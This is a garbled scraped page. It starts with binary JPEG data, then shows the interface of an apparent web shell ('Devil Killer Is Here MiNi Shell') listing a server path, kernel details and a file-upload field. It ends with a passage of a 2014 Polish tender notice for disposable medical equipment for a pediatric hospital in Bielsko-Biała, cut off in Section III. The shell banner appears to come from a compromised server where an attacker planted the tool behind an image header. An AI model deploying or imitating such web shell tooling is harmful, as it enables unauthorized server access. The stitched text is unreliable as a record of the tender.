JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/44988-N-2014.html

<p class="kh_header"><b>Bielsko-Biała: Dostawa sprzętu medycznego jednorazowego użytku oraz drobnego sprzętu medycznego dla potrzeb Szpitala Pediatrycznego w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 44988 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Pediatryczny Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Sobieskiego 83, 43-300 Bielsko-Biała, woj. śląskie, tel. 33828 40 00,828 40 40,828 40, faks 033 8151630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpediatryczny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego jednorazowego użytku oraz drobnego sprzętu medycznego dla potrzeb Szpitala Pediatrycznego w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu medycznego jednorazowego użytku oraz drobnego sprzętu medycznego dla potrzeb Szpitala Pediatrycznego w Bielsku-Białej. Zamówienie, obejmuje 22 Pakiety Szczegółowy asortyment oraz ilości określa załącznik nr 2 do niniejszej specyfikacji - formularz asortymentowo-cenowy. Oferta może obejmować dowolną ilość pakietów, decydując się na dany pakiet należy zrealizować go w całości. Realizacja zamówień częściowych następować będzie ściśle według wskazań Zamawiającego, zgodnie z telefonicznymi , pocztą elektroniczną lub faxowymi zamówieniami, dostosowanymi do potrzeb Zamawiającego składanych przez Kierownika Apteki lub pracownika przez niego wyznaczonego. Dane zamówienie należy dostarczyć do magazynu Apteki Szpitala w godz. od 7.00 do 12.00. Oferowany towar musi być nowy i nieużywany, musi posiadać aktualne świadectwa dopuszczenia do obrotu i używania zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. oraz spełniać wymogi określone przez Ministerstwo Zdrowia i posiadać aktualne certyfikaty CE oraz datę ważności minimum 6 miesięcy od momentu dostarczenia zamówienia do Zamawiającego. Zamawiający zastrzega sobie prawo żądania odpowiednich dokumentów, na każdym etapie badania ofert, jak również w trakcie realizacji umowy. Wykonawca zobowiązany jest do dostawy przedmiotu zamówienia wraz z informacją zawierającą dane producenta, opis zawierający wskazania producenta co do właściwości przedmiotu zamówienia, zasad bezpieczeństwa użytkowania i terminów ważności. Wymagania te muszą znajdować się na lub w opakowaniu w formie ulotki, w zależności od wyrobu, zgodnie z obowiązującymi w tym zakresie przepisami oraz muszą być podane w języku polskim. Określony w załączniku nr 2 zakres ilościowo-asortymentowy może ulec zmianie gdyż jest uzależniony od pacjentów zabezpieczonych przez Szpital pod względem medycznym, czego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć, z zachowaniem cen przetargowych. 
W trakcie sprawdzania ofert Zamawiający zastrzega sobie prawo do żądania od Wykonawców bezpłatnych próbek do każdej pozycji. Zamówienie obejmuje następujące zadania częściowe - pakiety: PAKIET nr 1 - igły i strzykawki, PAKIET nr 2 - ogólny, PAKIET nr 3 - rękawice, PAKIET nr 4 - materiały włókninowe i obłożenia, PAKIET nr 5 - sprzęt jednorazowy do sterylizacji, PAKIET nr 6 - sprzęt do EKG i EEG, PAKIET nr 7	 - cewniki do żył centralnych, PAKIET nr 8 - sondy i cewniki, PAKIET nr 9 - rurki tracheostomijne, PAKIET nr 10 - igły do punkcji, PAKIET nr 11 - zestawy do przetoczeń i kaniule dotętnicze, PAKIET nr 12 - rurki intubacyjne, PAKIET nr 13 - zestaw do drenażu jamy opłucnowej i inne, PAKIET nr 14 - zestaw linii do inwazyjnego monitorowania ciśnienia, PAKIET nr 15 - mocowania do rurek intubacyjnych i noski do NCPAP, PAKIET nr 16 - specjalistyczny sprzęt jednorazowy - laryngologiczny, PAKIET nr 17 - zamknięty próżniowy system pobierania krwi, PAKIET nr 18 - kaniule donosowe, bibuły do nawilżaczy, PAKIET nr 19 - czujniki do pomiaru SpO2, PAKIET nr 20 - terapia oddechowa, PAKIET nr 21 - laboratoryjny sprzęt jednorazowy, PAKIET nr 22 - groty Kirschnera
Warunki graniczne:
PAKIET NR 1 -  igły i strzykawki - Poz. nr 10 Strzykawka tuberkulinowa 1ml z igłą (osobną) 0,45x13 (nie dopuszcza się igły wtopionej). Wyskalowana na tuberkulinę z czytelną podziałką, minimalną pojemnością resztkową, łatwy i równomierny przesuw tłoka. Pakowane strzykawka + igła (jako całość) pojedynczo. Jałowe, niepirogenne typu LUER. Poz. nr 13 -18 Kaniule dożylne wykonane z teflonu, posiadające zastawkę antyzwrotną, zapobiegającą wypływowi krwi w momencie wkłucia. Poz. 22-29 Igły, oznaczenie barwne rozmiaru nasadek i opakowania jednostkowego produktu zgodnie z kodem międzynarodowym. Cały asortyment wymieniony w pakiecie musi być sterylny, pakowany pojedynczo. Strzykawki -wymagana jest czytelna podziałka, szczelność, łatwy i równomierny przesuw tłoka. 
PAKIET NR 2 - ogólny - Poz. 1-12 wymaga  się  aby  cały  asortyment  był   sterylny  i pakowany  pojedynczo. Poz. nr 1, 2, 3, 4, 6  - produkty nie zawierające ftalanów.
Poz. nr 7 Złączka typu Bionector: samozamykająca się, umożliwiająca wielokrotne iniekcje, pobieranie krwi do badania  oraz ciągłą infuzje z możliwością zastosowania  w linie tętnicze oraz żylne. Poz. nr 21 Szyny aluminiowe - łatwe do wyprofilowania, podklejone gąbką. Poz. nr 33 Słuchawki lekarskie -  mają być jednostronne składające się z przewodu, liry ze sprężyną, główki z membraną i miękkie oliwki. Poz. nr 36 - 39 - Worki do żywienia pozajelitowego mają być bez pirogenów, sterylne, wyposażone w zestaw dodatkowych drenów  umożliwiających szybkie napełnianie  pojemnika. Poz. nr 41 Staza bezlateksowa - wykonana z szerokiego rozciągliwego paska gumy syntetycznej, wysoka wytrzymałość na rozciąganie. Opakowanie umożliwiające wygodne dzielenie  perforowanych opasek. Poz. 44 - Ostrza do noży, sterylne. Wykonane ze stali nierdzewnej,  poprawnie wyprofilowany otwór umożliwiający nasadzanie na trzonek. Pakowane pojedynczo. Poz. nr 48 Bezpieczne igły do rozpuszczania leków. Z bocznym otworem o specjalnym szlifie umieszczonym na szczycie igły, nasadka igły idealnie dopasowana do końcówki LUER oraz LUER-LOCK, dostępna w rozmiarze 18Gx30mm, sterylna. Poz. nr 52, 53, 54 - Zamawiający w ramach wymienionych pozycji wymaga bezpłatnego użyczenia na czas trwania umowy: 4 szt. pojemników wielorazowego użytku 1000 ml na wkłady workowe, wykonanych z przeźroczystego poliwęglanu z certyfikowaną skalą pomiarową o spłaszczonym kształcie przystosowanym do zawieszenia na aparacie anestezjologicznym, wyposażonych w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego podłączony do źródła próżni na stałe, możliwość sterylizacji w 121 °C, 3 szt. pojemników wielorazowego użytku 2000 ml na wkłady workowe, wykonanych z przeźroczystego poliwęglanu z certyfikowaną skalą pomiarową, wyposażonych w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego podłączony do źródła próżni na stałe, możliwość sterylizacji w 121 °C, 7 szt. wsporników automatycznych plastikowych (do szyn wąskich i stołów operacyjnych) kompatybilnych z pojemnikami typu Serres. Poz. 55 - 61 - Maski krtaniowe mają być wykonane z jednego kawałka materiału, mankiet niskociśnieniowy nie przepełniający się pod wpływem gazów anestetycznych, rozmiar rurki i maksymalna objętość oznaczone na baloniku kontrolnym. Maski krtaniowe z wygięciem odpowiadającym anatomicznej budowie gardła bezlateksowe. Wzmocniony koniuszek maski. Znacznik głębokości kontrolujący prawidłowe usytuowanie maski. Poz. nr 62 i 63 Dreny  REDONA  z  mieszkiem  -  sterylne. Dren wykonany z materiału podatnego na wyginanie. Poz. nr 64 - 66 Dreny REDONA z butelką - sterylne. Poz. nr 68 - butelki - jałowe, sterylne, służąca do wywierania niskiego podciśnienia + dren łączący i uniwersalna końcówka schodkowa. Do drenów od rozmiaru 12-18.
PAKIET NR 3 - Rękawice - Poz. nr 1 Rękawice sterylne pudrowane o obniżonej zawartości pudru. Zawartość protein - <70?g/g. Pakowane w podwójne opakowanie, zewnętrzne powlekane folią polietylenową,  wewnątrz w kopertę papierową. Grubość ścianek: na dłoni: 0,23mm, mankiet 0,19mm, koniuszek palca 0,25mm (tolerancja +/- 0,02mm). AQL 1,0. Poz. nr 2 Rękawice latexowe pudrowane o obniżonej zawartości pudru. Zawartość protein - <70?g/g. Zakończone rantem, uniwersalny kształt pasujący na prawą i lewą dłoń. Mikroteksturowane, dodatkowa widoczna tekstura na końcach palców. Grubość ścianek: na dłoni: 0,14 mm, mankiet 0,09 mm, koniuszek palca 0,15 mm (tolerancja +/-  0,02mm). AQL 1,5. Poz. nr 3 Rękawice latexowe - jałowe, bezpudrowe, do wszystkich zabiegów operacyjnych. Zawartość protein - <50?g/g. Muszą posiadać w pełni anatomiczny kształt, pasujące na lewą i prawą dłoń. AQL 1,0. Poz. nr 4 Rękawice winylowe diagnostyczne, bezpudrowe, bezlatexowe, miękkie, rozciągliwe, wzmocniony rolowany mankiet. Bez zawartości ftalanów. AQL 1,5. Poz. nr 5 Rękawice diagnostyczne i ochronne,  nitrylowe, bezpudrowe, niejałowe, bez zawartości ZMBT, oznakowane jako wyrób medyczny i środek ochrony osobistej.  Wszystkie dane umieszczone fabrycznie na opakowaniu. Mikroteksturowane, dodatkowa widoczna tekstura na końcach palców. Grubość ścianek: na dłoni: od 0,07 - 0,10 mm, mankiet 0,07 mm, koniuszek palca 0,10 mm (tolerancja +/-  0,02mm), AQL 1,5, rękawice przebadane pod kątem EN 374-2, EN 388, potwierdzone przez jednostkę notyfikowaną. Wyniki badań wg EN 374 umieszczone fabrycznie na opakowaniu jednostkowym. Poz. 1, 2 ,3, 5  -badania na przenikalność dla wirusów zgodnie z  ASTM F 1671. Poz. 1, 2, 3, 4, 5 -badania na przenikalność dla wirusów zgodnie z EN-374-3. Poz. 2, 4, 5 -wyrób medyczny oraz środek ochrony osobistej. Poz. 2, 5 -posiadające certyfikat przydatności do kontaktu z żywnością, zgodne z normą EN 420. Poz. 5 -wyrób zapewniający ochronę w przypadku kontaktu z substancjami mogącymi powodować trwale uszkodzenie zdrowia lub życia. Poz. 1 i 3 opakowanie ma cienki min. 1,5cm wolny margines u góry, co zapewnia łatwe i antyseptyczne otwieranie opakowania. Data ważności na opakowaniu. Wszystkie poz.: zgodne z normą EN 455-1, 2, 3, wszystkie dane umieszczone przez producenta na opakowaniu, dodatkowo potwierdzone dokumentami dołączonymi do oferty. Zamawiający do pozycji od 1 do 5 wymaga dostarczenia bezpłatnych i bezzwrotnych próbek - po jednym opakowaniu do każdej pozycji. Opakowania z próbkami, oryginalne- wszystkie dane umieszczone przez producenta na opakowaniu, dodatkowo na opakowaniu nazwa Wykonawcy. Próbki należy dostarczyć wraz z ofertą.
PAKIET NR 4 - Materiały włókninowe i obłożenia jednorazowe - Poz. nr 8 Jednorazowy niejałowy fartuch chirurgiczny standardowy, zgodny z normą EN 13795, rękaw ułatwiający ruch, zakończony elastycznym mankietem z dzianiny,  tylne części fartucha zachodzą na siebie, rozmiary: M, L, XL, XXL (w zależności od potrzeb).
Poz. nr 9 Jednorazowy jałowy fartuch chirurgiczny standardowy, pełnobarierowy zgodny z normą EN 13795, gramatura min. 35g/m2 , rękaw ułatwiający ruch, zakończony elastycznym mankietem z dzianiny, tylne części fartucha zachodzą na siebie, umiejscowienie troków w specjalnym kartoniku umożliwia zawiązanie ich zgodnie z procedurami postępowania aseptycznego, opakowanie jednostkowe musi posiadać informację o dacie ważności i numer serii w postaci naklejek do umieszczenia na karcie pacjenta, rozmiary: M, L, XL, XXL (w zależności od potrzeb). Poz. 12 - 14 - Etykieta w języku polskim z dwoma naklejkami z datą, numerem lot i danymi producenta do wklejenia do dokumentacji medycznej. Zestaw nie może zawierać włókien celulozy. Poz. nr 15 - 18 Serwety włókninowe, sterylne wykonane z włókniny odpornej na penetrację mikrobiologiczną (na sucho i mokro), odpornej na penetrację płynów z materiału niepylnego, odpornego na przedziurawienie, rozerwanie (na sucho i morko) antyelektrostatyczne, wg normy EN 13795. Na opakowaniu samoprzylepna podwójna etykieta typu TAG z informacją identyfikującą pakiet, umożliwiającą wklejenie do dokumentacji Szpitala (lot, termin sterylizacji, ważności).
Zamawiający do pozycji od 1 do 12, 19, 21 oraz 22 wymaga dostarczenia bezpłatnych i bezzwrotnych próbek - po 1 szt. do każdej wyżej wymienionej pozycji. Próbki należy dostarczyć wraz z ofertą.
PAKIET NR 5 - sprzęt jednorazowego użytku do sterylizacji - Poz. nr 17 i 21 Testy do sterylizacji z wyraźną i łatwą do odczytu skalą, umożliwiającą wyraźną i natychmiast rozpoznawalną  zmianę koloru. Poz. nr 18 i 20 Taśmy do sterylizacji - nawinięte na rolce, z odpowiednim klejem i łatwe do odczytu. Poz. nr 24 i 25  Wskaźnik rurkowy do kontroli sterylizacji suchym, gorącym powietrzem o parametrach R 180 o barwie  początkowej innej niż barwa po zakończeniu sterylizacji. 
PAKIET NR 6 sprzęt do EKG i EEG - Poz. nr 11 Ustnik papierowy  do spirometru, jednorazowy do aparatu abc PNEUMO 2000RS, średnica mierzona na zewnątrz ustnika 30mm. 
PAKIET NR 8 - Sondy i cewniki - Poz. 1 -10 Cewniki  do  odsysania -  cewnik  powinien  posiadać: barwne i numeryczne oznaczenie rozmiaru na opakowaniu jednostkowym, otwór centralny + dwa koncentryczne otwory boczne, powierzchnia otworów bocznych nie może  przekraczać 50% otworu centralnego. Poz. nr 11 - 13 Sondy do karmienia mają być skalowane co 1 cm, z zatyczką LUER LOCK, atraumatycznym zamkniętym zakończeniem i na przemian ległymi otworami bocznymi, pasek RTG, sterylne. Poz. nr 18 - 19 Cewniki Foleya  nr 06, 08  mają być z prowadnicą. Poz. nr 27 - 32 Cewniki urologiczne - mają posiadać dwa otwory boczne, atraumatycznie zamknięty koniec, barwne i numeryczne oznaczenie rozmiaru fabrycznie nadrukowanego na opakowaniu jednostkowym. Poz. nr 23 Zatyczka uniwersalna do cewników Foleya ma być sterylna i schodkowa, karbowana. 
PAKIET NR 12 - rurki intubacyjne - rurki bez mankietu do przedłużonej intubacji 
poz. nr 1 Rurki wykonane z mieszaniny silikonu i PCV, półprzeźroczyste, z linią RTG, centymetrowe oznaczenie  głębokości intubacji na korpusie rurki z obydwu stron.
rurki do krótkotrwałych intubacji. Poz. nr 2 Rurki intubacyjne z mankietem wyposażone w znacznik intubacyjny w postaci oringu wokół rurki skalowane co 1 cm, atraumatyczne, o wyoblonych krawędziach posiadające oczko Murphiego, mankiet uszczelniający  niskociśnieniowy o zmniejszonej przenikalności dla gazów anestetycznych z nitka radiacyjną na całej długości, oznaczenie rozmiaru na rurce i łączniku. Poz. nr 5 Maski anestetyczne z nadmuchiwanym kołnierzem dostępne w sześciu rozmiarach 0-5. Wykonane z 100% PCV medycznego z przeźroczystą kopułą, rozmiary oznaczone kolorami, miękki kołnierz zapewniający dobre przyleganie do twarzy pacjenta, wyposażone w zastawkę regulującą wypełnienie kołnierza.
PAKIET NR 13 - zestaw do drenażu jamy opłucnowej i inne - Poz. nr 1, 2 i 3 Dreny do drenażu jamy opłucnowej rozm. 8 F, 10F, 12 F - miękki z trokarem tępym. Dren  powinien posiadać oznaczenie rozmiaru łącznik płaski uchwyt troakara oraz podziałkę co 2 cm. Poz. nr 4 i 5 Dreny do drenażu jamy opłucnowej rozm  16 F, 20 F, 24 F- standardowy z trokarem tępym. Poz. nr 6 Wielokomorowy zestaw do drenażu biernego i czynnego- pojemność 1900 ml,  dokładna regulacja siły ssania, zastawka wodna wypełniana przez port, skalowanie zaczynające się od 10 ml. Wymaga  się możliwości zastosowania u noworodków z niska wagą urodzeniową. Poz. nr 7 i 8 Zestaw  do  znieczuleń  zewnątrz oponowych - zawierający igłę Tuchy, cewnik strzykawkę, łącznik, filtr oraz zatrzaskowy element do mocowania cewnika. PAKIET NR 14 - zestaw linii do inwazyjnego monitorowania ciśnienia - Poz. nr 1 Zestaw linii do inwazyjnego pomiaru ciśnienia krwi - zamknięty system jednorazowych przetworników do inwazyjnego monitorowania ciśnienia krwi, pozwalający na pobieranie próbek krwi, długość linii 135 cm, przezroczysta, do stosowania z pompami infuzyjnymi, strzykawka w układzie 3 cm3 z ogranicznikiem do 1 cm3, prędkość płukania przepływu 30 cm/ h, dostosowana do monitorów typu Biazet, Dinamap, Critikon. Poz. nr 2 Blocer - zawór odcinający włączony w linie infuzyjne typu Connecta Floswitch.
PAKIET NR 15 - Mocowania do rurek intubacyjnych i noski do NCPAP - Poz. nr 1 Stabilizatory do rurek intubacyjnych i cewników CPAP, składające się z klap do mocowania i platformy stabilizacyjnej. Umożliwiające mocowanie bez użycia plastrów, za pomocą klap z żelem hydrokoloidowym. Dostępne w siedmiu różnych rozmiarach. Poz. nr 2 Noski NCPAP z dwoma wejściami do nosa. Wykonane z miękkiego, nielateksowego materiału. Dostępne w pięciu różnych rozmiarach i długościach.
Pakiet nr 16 - specjalistyczny sprzęt jednorazowy - laryngologiczny - Poz. nr 1 Zestaw do leczenia  zatok  nosa, o średnicy wewnętrznej 0,8 mm, długość drenu 18 cm, igła punkcyjna 2,0 x 80; iniekcyjna 0,8 x 40. Wyrób jednorazowego użytku, nietoksyczny, jałowy. Poz. nr 2 Przyrząd do drenażu jamy bębenkowej ucha środkowego:Typ II śr. 1,15 mm; jałowy nietoksyczny; pakowany pojedynczo.
PAKIET NR 17 zamknięty próżniowy system pobierania krwi - Należy zaoferować bezpieczny system próżniowy pobierania krwi. Igły, probówki,  Holdery - musza być kompatybilne. Poz. nr 1, 2, 3 Igła  mocowana  zatrzaskowo  lub  na  wkręt. Igły maja być kompatybilne z Holderem automatycznym jak również jednorazowym. Poz. nr 7 - 11 Wskazane objętości probówek dotyczą wielkości pobrania krwi. Probówki, jednorazowe wykonane z przeźroczystego tworzywa - plastik. Probówki mają być oznaczone kolorami ułatwiającymi identyfikacje w rutynowej pracy, zgodnym z normą ISO 6710. Korki próbówek zdejmowane lub odkręcane zależnie od pojemności. Poz. nr 7 i 8 Próbówki biochemiczne bez separatora żelowego oraz bez kulek. Poz. nr 13 - 15 Próbówki do koagulologii i oporności pakowane po 10 szt. - maksymalnie 50 szt. Poz. nr 12 Pipety do analizy OB (200mm) plastikowe, skalowane z adapterem do wykorzystania z próbówkami OB, dające rozwiązanie odczytu w skali liniowej z użyciem kalibrowanej kapilary.
PAKIET NR 20 - terapia oddechowa - Poz. nr 7: układ oddechowy wykonany wewnątrz z rury gładkiej, grzałka w ramieniu wdechowym do podłączenia z nawilżaczem F&P MR 730, ramie wdechowe odłączalne od Łącznika Y w celu podłączenia nebulizatora, port na łączniku Y - 7,6mm, komora nawilżacza zintegrowana z drenem do źródła wody (automatyczny pobór wody), na ramieniu wdechowym pułapka wodna, złącze do respiratora - 15M, złącze Y - 15 F. Poz. nr 8:  układ oddechowy 15mm wykonany wewnątrz z rury gładkiej, długość układu 1,6m; grzałka w ramieniu wdechowym do podłączenia z nawilżaczem F&P MR 730, ramie wdechowe odłączone od Y celem podłączenia nebulizatora, komora nawilżacza automatycznie napełniająca się z zintegrowanym drenem do źródła wody, na ramieniu wdechowym pułapka wodna, złącze do respiratora 22M, złącze Y - 22M/15F. Poz. nr 9: długość układu 1,6m; odłączana gałąź wdechowa, do podłączenia do nebulizatora, złącza do respiratora - 22F, złącze Y - 22M/15F. Poz. nr 15: jednorazowy mikrobiologicznie czysty układ oddechowy noworodkowy do respiratora Sechrist, układ o dł. 1,6 m.: ramie wdechowe - 2 przeźroczyste rury noworodkowe 10 mm, ramie wdechowe do komory nawilżacza o długości 40 cm, dł. ramienia wdechowego 120 cm + 40 cm zaopatrzony w port umożliwiający podłączenie czujnika temperatury, spirala grzejna między nawilżaczem a pacjentem z koniczynowym złączem do adaptera, Y noworodkowy rozłączalny z portem i drenem ciśnieniowym. Ramie wydechowe - 2 przeźroczyste rury 10 mm, dł. 120 cm + 40 cm, samouszczelniająca się pułapka wodna typu noworodkowego, zestaw zawiera automatyczna komorę, odłączalny Y, 2 złącza elastomerowe, 15F/9-11mm, 2 złącza 22F/15F, złącze 8,5F/15M.
PAKIET NR 21 - laboratoryjny sprzęt jednorazowy - Poz. nr 15 Kapilary do gazometrii z heparyną sodową 80 LU/m o pojemności 175 ?l o 2,3mm, długości 100mm w zestawie z dwoma zatyczkami gumowymi i jednym mieszalnikiem w stosunku do kapilarów o odpowiedniej grubości umożliwiającym dokładne wymieszanie próbki krwi, zestaw: 1 a 250 kapilar, 1 a 500 zatyczek gumowych, 1 a 250 mieszalników (opiłków).
Zamawiający wymaga dostarczenia wraz z ofertą bezpłatnych i bezzwrotnych próbek do pozycji nr 2, 14, 15, 16, 19 i 20 - po 3 szt. Poz. 24, 25, należy dołączyć  do każdej z pozycji dokument potwierdzający przeżywalność szczepów wzorcowych w czasie 6, 24, 48 i 72 godzin od momentu pobrania. Poz. 21-26 musi mieć potwierdzoną jałowość odpowiednim dokumentem. Zamawiający wymaga dostarczenia wraz z ofertą bezpłatnych i bezzwrotnych próbek do pozycji nr 22, 23, 27 i 28 - po 3 szt.
Pakiet NR 22 - groty Kirschnera - Wykonane z wysokostopowej, odpornej na korozję stali chromowo-niklowo-molibdenowej o najwyższej czystości.
Pozostałe pakiety i pozycje zgodne  ze  specyfikacją  podaną w załączniku nr 2 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8, 33.14.13.00-3, 33.14.13.10-6, 33.14.13.20-9, 33.14.13.21-6, 33.14.14.11-4, 33.14.14.20-0, 33.14.16.15-4, 33.14.16.40-8, 33.14.16.41-5, 33.19.25.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków Zamawiający wymaga złożenia stosownego oświadczenia z art. 22 ust. 1 ustawy prawo zamówień publicznych o spełnieniu warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 3 do SIWZ. Ocena spełnienia tego warunku zostanie dokonana na podstawie kompletności złożonego oświadczenia wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
